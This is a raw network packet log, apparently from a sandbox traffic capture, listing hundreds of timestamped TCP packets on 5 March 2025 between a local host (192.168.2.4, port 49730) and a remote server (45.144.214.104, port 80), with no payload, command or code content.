Mar 5, 2025 10:52:08.492691040 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.492727041 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.492774963 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.492789984 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.492821932 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.492866993 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.492882967 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.505563021 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.505635977 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.505655050 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.505696058 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.505743027 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.505757093 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.505789995 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.505832911 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.505847931 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.505882978 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.505943060 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.545161009 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545331955 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545341969 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545356035 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545367002 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545375109 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545387030 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.545398951 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545409918 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545418978 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545434952 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.545447111 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545454979 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.545486927 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.545579910 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545630932 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545680046 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545697927 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.545737028 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545785904 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545799971 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.545854092 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545903921 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.545921087 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.545989037 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546039104 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.546066999 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546122074 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546169043 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.546197891 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546256065 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546303988 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546318054 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.546365976 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546411037 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546427011 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.546458960 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546504974 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.546535969 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546570063 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546614885 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.546643019 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546678066 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546725035 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546740055 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.546771049 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546806097 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546828032 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.546863079 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546907902 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.546924114 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.546978951 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547032118 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.547055960 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547089100 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547132015 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.547149897 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547205925 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547281981 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.547310114 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547344923 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547394991 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547411919 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.547466993 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547514915 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547529936 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.547564983 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547599077 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547621012 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.547653913 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547687054 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547708035 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.547744036 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547777891 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547794104 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.547827959 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547871113 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547887087 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.547916889 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547960043 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.547975063 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548011065 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548044920 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548063993 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548094988 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548129082 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548151970 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548183918 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548229933 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548243999 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548275948 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548332930 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548350096 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548599005 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548616886 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548625946 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548638105 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548646927 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548650980 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548660040 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548671007 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548681974 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548686028 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548686028 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548693895 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548705101 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548708916 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548715115 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548727989 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548728943 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548741102 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548749924 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548754930 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548763990 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548772097 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548773050 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548784971 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548794985 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548794985 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548808098 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548815012 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548820019 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548830986 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548840046 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548845053 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548856020 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548865080 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548873901 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548883915 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548892975 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548893929 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548904896 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548916101 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548917055 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548917055 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548917055 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548928976 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548939943 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548949957 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548954010 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548954010 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548954010 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.548960924 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548971891 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.548984051 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.549014091 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.549014091 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.549048901 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.583973885 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.583992004 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.584001064 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.584008932 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.584014893 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.584021091 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.584042072 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.584053040 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.584055901 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.584099054 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.584099054 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.597209930 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.597222090 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.597233057 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.597279072 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.597289085 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.597290993 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.597307920 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.597318888 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.597326040 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.597332001 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.597352028 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.597378969 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.636904955 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.636920929 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.636929035 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.636939049 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.636949062 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.636957884 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.636966944 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637016058 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637022972 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637023926 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637037039 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637058973 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637068987 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637079000 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637089968 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637096882 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637096882 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637099981 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637119055 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637129068 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637140036 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637147903 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637154102 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637159109 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637170076 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637176037 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637180090 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637191057 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637201071 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637226105 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637226105 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637249947 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637425900 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637454033 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637465000 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637473106 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637490988 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637504101 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637512922 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637514114 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637512922 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637542963 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637547016 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637554884 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637566090 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637576103 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637586117 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637594938 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637595892 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637605906 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637617111 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637628078 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637628078 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637628078 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637648106 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637653112 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637665033 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637670040 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637675047 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637685061 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637695074 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637717962 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637718916 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637727022 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637739897 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637752056 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637752056 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637752056 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637763977 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637775898 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637785912 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637795925 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637799978 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637800932 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637820005 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637924910 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637974977 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.637975931 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.637985945 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638026953 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638030052 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638037920 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638048887 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638058901 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638078928 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638117075 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638134956 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638151884 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638160944 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638170958 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638183117 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638197899 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638200998 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638211966 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638220072 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638232946 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638242960 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638251066 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638252020 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638271093 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638302088 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638391018 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638410091 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638420105 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638430119 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638441086 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638457060 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638487101 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638500929 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638513088 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638530970 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638540030 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638544083 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638551950 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638565063 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638570070 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638591051 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638681889 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638699055 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638716936 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638727903 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638729095 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638739109 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638751030 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638761044 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638791084 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638920069 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638931036 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638940096 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638950109 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638961077 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638968945 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638972044 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638983011 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638993979 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.638998985 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.638998985 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.639008045 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.639023066 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.639061928 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.639091969 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.639101982 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.639137983 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.639139891 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.639159918 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.639169931 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.639178991 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.639189005 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.639202118 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.639220953 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.639220953 CET	80	49730	45.144.214.104	192.168.2.4
